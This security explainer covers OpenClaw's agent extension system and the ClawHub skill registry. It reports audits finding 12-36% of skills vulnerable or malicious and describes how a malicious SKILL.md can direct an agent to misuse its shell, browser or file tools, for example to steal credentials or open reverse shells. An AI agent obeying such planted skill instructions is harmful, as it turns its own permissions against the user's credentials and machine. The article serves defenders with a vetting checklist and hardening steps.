
OpenClaw Skills & ClawHub: How Extensions Work (and Why 12-36% Are Risky)

OpenClaw is an open-source AI agent platform whose extension system is both its strongest selling point and its most active attack surface. Skills teach the agent when and how to call tools. ClawHub is the community registry where those skills live. As of April 2026, audits from Koi Security, Bitdefender, and Snyk put the share of ClawHub skills containing vulnerabilities or outright malicious payloads somewhere between 12% and 36% -- the range depends on who counted and how. This piece walks through the architecture, what ClawHub actually is, the exact numbers each auditor reported, and how to vet a skill before installing.

Quick Verdict
ClawHub hosts 3,000 to 10,700 community skills depending on who is counting. Between 12% and 36% have vulnerabilities or malicious payloads. Vet every skill. Pin versions. Assume supply-chain risk until proven otherwise.

What Is a Skill in OpenClaw?

In OpenClaw's architecture, a skill is the guidance layer. Tools are what the agent can do -- execute shell commands, browse the web, read files, send messages. Skills are instructions that teach the agent when and how to reach for those tools. Mechanically, a skill is a SKILL.md file (plus optional scripts) injected into the model's system prompt when loaded.

Skills are distributed as npm packages. Installing a skill drops files into the OpenClaw workspace and registers it with the agent. The SKILL.md file is plain Markdown: title, description, step-by-step guidance for the model, and sometimes example prompts. There is no binary to execute and no fine-tuning -- the skill changes behavior purely by rewriting the prompt context.
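To make that concrete, here is what a minimal SKILL.md might look like. This is a hypothetical sketch -- field names and layout vary between skills, and nothing below is an official schema:

```markdown
# PDF Summarizer

Summarize local PDF files the user points at.

## When to use
Use this skill when the user asks for a summary of a PDF on disk.

## Steps
1. Use the `read` tool to load the file the user named.
2. Produce a five-bullet summary, quoting page numbers where possible.
3. Do not use `exec` or `browser` -- this skill needs neither.

## Example prompt
"Summarize ~/reports/q1.pdf in five bullets."
```

Note that the entire artifact is prose aimed at the model. A malicious author would simply write step 2 differently.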

What this means for threat modeling: A skill cannot do anything a tool cannot already do. If your config grants the agent exec, browser, or filesystem permissions, a skill can instruct the agent to abuse them. The skill is a social-engineering layer directed at the model. Permissions still live in config files, not skill files.

  • 3K-10.7K -- ClawHub skills (range). Clarifai / Skywork / ClaudeFast, Mar 2026. The range spans community-only counts to totals including forks; there is no shared registry figure.
  • 53 -- official vetted skills. Skywork, Mar 24, 2026.
  • 12-36% -- malicious or vulnerable. Koi Security / Bitdefender / Snyk.
  • 1 week -- minimum GitHub account age to publish. ClawHub publisher policy.

Tools vs Skills vs Plugins -- The Three Layers

OpenClaw's extension system has three distinct layers. Confusing them is the first mistake most readers make.

  • Layer 1 / Action -- Tools. Typed functions the agent invokes directly. Shipped with OpenClaw or added by plugins. These are the things that actually do something. Examples: exec, browser, web_search, read, apply_patch, message, canvas, nodes, cron, image, sessions_*.
  • Layer 2 / Guidance -- Skills. SKILL.md files injected into the system prompt. They instruct the model on when and how to use existing tools. They grant no new capabilities on their own. Format: SKILL.md plus optional prompts and scripts.
  • Layer 3 / Packaging -- Plugins. Installable npm packages that bundle tools, skills, model providers, and messaging channels into a single distributable unit. Example: npm install @clawhub/whatsapp-agent.

A practical example: the WhatsApp plugin ships a tool (send_message), a skill (when to respond, how to thread conversations), a model provider, and a channel integration. Uninstall the plugin and all four go away together.

For the rest of this article, "skill" refers to the SKILL.md package on ClawHub; "plugin" refers to the full bundle. The two terms get conflated in community discussions, but the security risks differ: a plugin can add new tools (expanding the attack surface), while a skill can only rewrite the prompt (expanding the instruction surface). Both matter.


What Is ClawHub?

ClawHub is the community marketplace for OpenClaw skills and plugins. It is the closest analogue to npm, VS Code's Marketplace, or a browser extension store. Publishers upload packages; users install them with the openclaw install command.

The trust model is where the problem begins. Three characteristics define ClawHub's current posture:

  • Publisher barrier: a GitHub account at least one week old. That is the entire bar. No identity verification, no prior-work check, no paid-account requirement.
  • No mandatory code review. Submissions are published on upload. There is no human reviewer, no committee, no staged rollout.
  • No package signing. Users have no cryptographic way to verify that the package they install is the one the publisher wrote.

VirusTotal scanning was added in February 2026, but only for new submissions. Older skills -- the ones that accumulated installs during 2025 and early 2026 -- were not re-scanned retroactively. That means a skill published in December 2025 that passed popularity thresholds before VirusTotal integration may still be sitting on ClawHub without ever being scanned.

Compare that to mature package registries. npm has a well-documented malware problem of its own, but it also has organizational verification for high-profile publishers, 2FA requirements for popular maintainers, and a security advisory database. ClawHub, in April 2026, has none of those.


3K-10.7K skills on ClawHub, depending on the auditor. Pick the range, not the number -- the disagreement itself is the story.

The Skill Count Problem -- Why Numbers Disagree

Three separate market trackers published ClawHub skill counts in March 2026. None of them agreed -- the gap is a 3.5x spread. Any article, vendor pitch, or investor deck citing "X skills on ClawHub" is usually citing one number out of three and presenting it as ground truth.

| Source | Date | Reported Count | Likely Scope |
| --- | --- | --- | --- |
| Clarifai | Mar 6, 2026 | 10,700 | Total including forks, renames, deprecated |
| Skywork | Mar 24, 2026 | 3,000 community + 53 official | Active community skills excluding duplicates |
| ClaudeFast | Mar 27, 2026 | 5,700+ | Community-built skills, unspecified filtering |

The honest framing: 3,000 to 10,700 skills depending on source and counting method, with roughly 53 marked as official. As of late March 2026, ClaudeFast reports 5,700 or more community-built skills alongside those 53 official ones. If you need one number for a slide, pick 5,700 -- but keep the error bars.

Why does this matter for security? Because rates -- "12% are malicious" -- depend on the denominator. Koi Security audited 2,857 skills. Bitdefender's ~20% is against total, but which total? Snyk's ToxicSkills project found 1,467 vulnerable skills out of an unspecified base. The next section walks through each.
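The denominator effect is easy to see with quick arithmetic. Take Koi's 341 confirmed-malicious skills and divide by each published registry count (a sketch; only the 2,857-sample figure is a rate Koi actually reported):

```shell
# Same numerator, three denominators: the headline "malicious rate"
# swings by roughly 4x depending on which skill count you divide by.
for total in 2857 5700 10700; do
  awk -v m=341 -v t="$total" 'BEGIN { printf "341 / %d = %.1f%%\n", t, 100 * m / t }'
done
```

Against Koi's own 2,857-skill sample, 341 rounds to the reported 12%; against Clarifai's 10,700 total, the identical payload count would read as roughly 3%.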


The Malicious Skills Problem

Three independent audits plus one publisher-concentration finding have put numbers on the malicious-skill rate. They used different samples, different definitions of "malicious" versus "vulnerable," and different detection methods. Each deserves its own row, because picking one favorite figure to quote misrepresents the full picture.

Koi Security -- 12% of 2,857 audited (341 malicious)
Koi's "ClawHavoc" investigation audited 2,857 skills and flagged 341 as malicious. The campaign distributed Atomic Stealer (AMOS), a macOS credential grabber, via typo-squatted packages such as solana-wallet-tracker and youtube-summarize-pro. Koi's definition of "malicious" required an active credential-exfiltration or reverse-shell payload, not just a risky permission.
Bitdefender -- ~20% of total (~900 malicious)
Bitdefender's sweep reported ~20% of ClawHub skills as malicious (approximately 900 packages). Their case study: a fake Polymarket trading bot that opened a reverse shell on the host, giving the attacker live terminal access rather than a one-shot credential theft. Bitdefender's rate appears higher than Koi's because they scored a broader set of behaviors as "malicious," including persistent network callbacks and suspicious outbound DNS.
Snyk ToxicSkills -- 36% have security flaws (1,467 vulnerable, 76 confirmed malicious)
Snyk's ToxicSkills project produced the highest headline rate: 36% of audited skills contained security flaws. Their count splits into 1,467 skills with exploitable vulnerabilities (injection, unsafe deserialization, weak secret handling) and 76 with confirmed malicious payloads. The gap between Snyk and Koi is mostly definitional: Snyk counts vulnerabilities; Koi counts active payloads. The Snyk number is the upper bound of what you should expect to encounter.
Single-publisher concentration -- "hightower6eu" uploaded 314+ malicious skills
A single publisher account, hightower6eu, was found to have uploaded 314+ skills containing malicious payloads. That one account is responsible for a meaningful slice of the overall count. ClawHub's week-old-GitHub-account barrier does nothing to prevent a single actor from cycling through fresh accounts -- or simply using one account at scale.

The honest one-line summary: between 12% and 36% of ClawHub skills contain vulnerabilities or malicious payloads, depending on audit methodology. Koi's 12% is the rate for active, confirmed payloads. Snyk's 36% includes exploitable but not-yet-weaponized flaws. Neither is the "right" number in isolation.


How Malware Reaches You

Three vectors recur across the Koi, Bitdefender, and Snyk reports. They are not novel to ClawHub -- they are the same software supply-chain patterns security teams have been tracking in npm, PyPI, and VS Code Marketplace since 2021. ClawHub's contribution is extending them to AI agents that already hold tool permissions.

1. Credential stealers targeting ~/.openclaw/

By default, OpenClaw stores API keys, OAuth tokens, and messaging credentials as plaintext under ~/.openclaw/. That directory is a named target in RedLine, Lumma, and Atomic Stealer (AMOS) distribution chains. A malicious skill does not need to open a connection; it just needs to execute once, grep the credentials directory, and exfiltrate. The Koi "ClawHavoc" campaign used exactly this pattern.
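One cheap mitigation while credentials are still on disk is tightening filesystem permissions so other local users (and anything running as them) cannot read the directory. A sketch, assuming the default ~/.openclaw/ location:

```shell
# Restrict the credential directory to the owning user only.
chmod 700 ~/.openclaw
chmod 600 ~/.openclaw/* 2>/dev/null   # top-level files; recurse as needed

# Verify: this should print nothing if no file is readable by "other".
find ~/.openclaw -type f -perm -o+r
```

This does not stop a stealer running as your own user -- only moving secrets out of plaintext does that -- but it closes the shared-host and multi-user case.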

2. curl | bash install scripts

Many ClawHub skills include installation prerequisites in their documentation. A common shortcut is curl https://example.com/install.sh | bash. That single line bypasses every ClawHub scanning layer -- even if VirusTotal scanned the npm package, the post-install script pulls fresh code from the publisher's server at install time. The scanner cannot see what the user will run.
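If a prerequisite script is unavoidable, download it to disk, read it, and pin its hash so that what you reviewed is exactly what you run. A hypothetical helper -- the run_verified name and the hash-pinning flow are illustrative, not a ClawHub feature:

```shell
# Execute a script only if its SHA-256 matches the hash of the copy you reviewed.
run_verified() {
  file="$1"
  expected="$2"
  actual=$(sha256sum "$file" | awk '{print $1}')
  if [ "$actual" = "$expected" ]; then
    bash "$file"
  else
    echo "checksum mismatch: refusing to run $file" >&2
    return 1
  fi
}

# Usage sketch:
#   curl -fsSL -o install.sh https://example.com/install.sh
#   less install.sh            # actually read it
#   sha256sum install.sh       # record this hash
#   run_verified install.sh <recorded-hash>
```

The point is the gap this closes: a server can serve clean code to the scanner and a payload to you, but it cannot change the bytes already on your disk.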

3. WebSocket exploitation

OpenClaw's Gateway runs a WebSocket server on port 18789. In February 2026, a patch closed CVE-2026-25253 (CVSS 8.8), a one-click RCE via a WebSocket origin-header bypass: a malicious webpage could trick the control UI into trusting an attacker-supplied gateway URL, exfiltrating the auth token and executing arbitrary commands. Between 30,000 and 135,000 instances were estimated exposed at disclosure (per Censys and follow-on reports); more than 50,000 were directly vulnerable to RCE. A March 2026 follow-up (fixed in v2026.2.25) patched a localhost-trust flaw in which JavaScript running in a browser could brute-force the gateway password. Skills can direct the agent to interact with gateways -- which means a malicious skill can abuse these primitives even on patched systems if the operator has not bound the gateway to loopback.

The core issue: OpenClaw exposes 0.0.0.0:18789 by default rather than binding to loopback. Every hardening guide for the past two releases starts with "change the bind address." Many users never do.
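Checking your own exposure takes one line. A sketch using ss; substitute lsof -i :18789 or netstat -an on systems without it:

```shell
# Print any listening socket on the gateway port.
# 0.0.0.0:18789 or [::]:18789 means network-reachable;
# 127.0.0.1:18789 means loopback-only.
ss -ltn | awk '$4 ~ /(^|:)18789$/ { print $4 }'
```

If the local address column shows a wildcard bind, fix the gateway config before worrying about any individual skill.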


How to Vet a Skill Before Installing

Assume every unvetted ClawHub skill is hostile until the opposite is demonstrated. The work is manual and tedious -- there is no automated tool in April 2026 that replaces reading source. The checklist below is the minimum bar for anything touching real credentials.

Pre-install vetting checklist
  • Read the SKILL.md source on GitHub. Do not trust the ClawHub landing page. Open the repository the package links to and read the actual SKILL.md file plus every shell script the install references.
  • Check publisher age and prior skills. A week-old account with one skill is a signal. Look for publishers with a multi-month track record and prior skills that received real community review.
  • Pin exact versions. Never install with @latest. Pin to the exact version you reviewed. A maintainer takeover or credential compromise can push a malicious update to an otherwise trusted skill.
  • Avoid curl | bash prerequisites. If the skill's documentation tells you to pipe a remote shell script into your shell, walk away. Install prerequisites manually from a source you trust.
  • Review exec, browser, and filesystem permissions. A summarizer skill should not need shell execution. A translation skill should not need browser control. Overbroad permission requests are the single clearest red flag.
  • Separate personal and company workspaces. Use distinct ~/.openclaw/ directories, distinct API keys, and distinct OS users. A compromised personal skill should not be able to touch production credentials.
  • Run in a sandbox first. NanoClaw provides mandatory container isolation. Install the skill in a throwaway NanoClaw container, observe behavior for several sessions, then consider promoting it to your main OpenClaw environment.
  • Monitor outbound WebSockets after install. Unexpected WebSocket connections post-install are the signature of CVE-2026-25253-style exploitation. A simple lsof -i on macOS and Linux or Resource Monitor on Windows will flag new listeners.
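Two of the checks above -- piped install scripts and credential-directory references -- can be partially mechanized with a grep pass over the unpacked package. A minimal sketch (the scan_skill name and patterns are illustrative, and a clean result proves nothing on its own):

```shell
# Flag the two cheapest red flags in an unpacked skill directory.
scan_skill() {
  dir="$1"
  grep -rnE 'curl[^|]*\|[[:space:]]*(ba)?sh' "$dir" \
    && echo "FLAG: piped remote install script"
  grep -rn '\.openclaw' "$dir" \
    && echo "FLAG: references the credential directory"
  return 0
}
```

Run it as scan_skill ./some-skill/ before installing; treat any FLAG line as a reason to read the matching file in full, not as a verdict.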

None of this is OpenClaw-specific -- it is the same workflow engineers already apply to VS Code extensions and browser plugins. The only thing new is that OpenClaw skills inherit full agent permissions the moment they load.


Official Skills vs Community Skills

Skywork's March 24, 2026 count distinguishes 3,000 community skills from 53 official skills. That 53 is the number that matters for teams that want to minimize review overhead.

Official skills are published by the OpenClaw maintainers -- since Peter Steinberger's move to OpenAI on February 14, 2026, that means the transitional open-source foundation backing the project. They cover core integrations -- major messaging channels, canonical model providers, common filesystem and shell workflows -- and are reviewed and versioned against every release. They still should not be trusted blindly, but the baseline risk is lower.

Community skills are vet-yourself. The audits in the previous section apply to this 3,000-plus-skill population. Some are excellent, actively maintained, and extensively reviewed; some were uploaded by a week-old account yesterday. ClawHub does not visually distinguish between the two outside of the "official" badge.

Practical default: if an official skill exists for what you need, use it. Only reach into community skills when the official lineup does not cover the use case, and budget review time accordingly.


When to Use OpenClaw Skills vs Alternatives

OpenClaw is not the only agent runtime built around this architecture. Three sibling projects share the SKILL.md model with different security postures and target environments. If your use case fits one of their profiles, you get better defaults without giving up the skill ecosystem.

  • NanoClaw (container isolation). Approximately 700 lines of TypeScript (versus OpenClaw's 430K+) with mandatory container isolation. The security champion of the family. Use it as the sandbox for vetting untrusted ClawHub skills before promoting them to OpenClaw.
  • NemoClaw (enterprise policy). NVIDIA's enterprise wrapper, released in early preview on March 16, 2026. The OpenShell runtime enforces Landlock and seccomp, network egress is governed by policy-as-code, and inference routing is managed. Use it when corporate policy requires documented egress controls.
  • ZeroClaw (edge / IoT). A Rust reimplementation: 3.4 MB binary, sub-10ms cold boot, under 5 MB of RAM. Use it for edge and IoT deployments where OpenClaw's 500 MB base and roughly 2,500 ms cold boot are disqualifying.

The broader ecosystem also includes O-Mega AI ($25,000/year managed SaaS with a no-code dashboard), and the cross-category alternatives -- Claude Code for pure coding, AutoGPT and CrewAI for framework-style orchestration.


Before You Use AI
Your Privacy

OpenClaw runs on your own infrastructure, but it talks to external model APIs for reasoning. Credentials live under ~/.openclaw/ in plaintext by default -- move them to an external secrets manager (supported in v2026.2.26 or later) before running anything with production keys. Commercial API data-handling policies apply for whichever provider you point the agent at. Enterprise and business plans from Anthropic, OpenAI, and Google generally exclude API traffic from training; free and consumer tiers may not.

Mental Health & AI Dependency

Triaging a potential supply-chain compromise is high-stress work. Take breaks. Do not let an agent's confidence substitute for your own review. If you or a teammate is in crisis:

  • 988 Suicide & Crisis Lifeline -- Call or text 988 (US)
  • SAMHSA Helpline -- 1-800-662-4357
  • Crisis Text Line -- Text HOME to 741741
Your Rights & Our Transparency

Under GDPR and CCPA, you have the right to access, correct, and delete your personal data. Tech Jacks Solutions maintains editorial independence from all vendors discussed -- OpenClaw maintainers, NVIDIA, Anthropic, OpenAI, Koi Security, Bitdefender, and Snyk. This article was not sponsored, reviewed, or approved by any of them. We do not receive affiliate commissions from OpenClaw deployments. Claims are based on primary documentation (OpenClaw docs, CVE disclosures) and published third-party audits.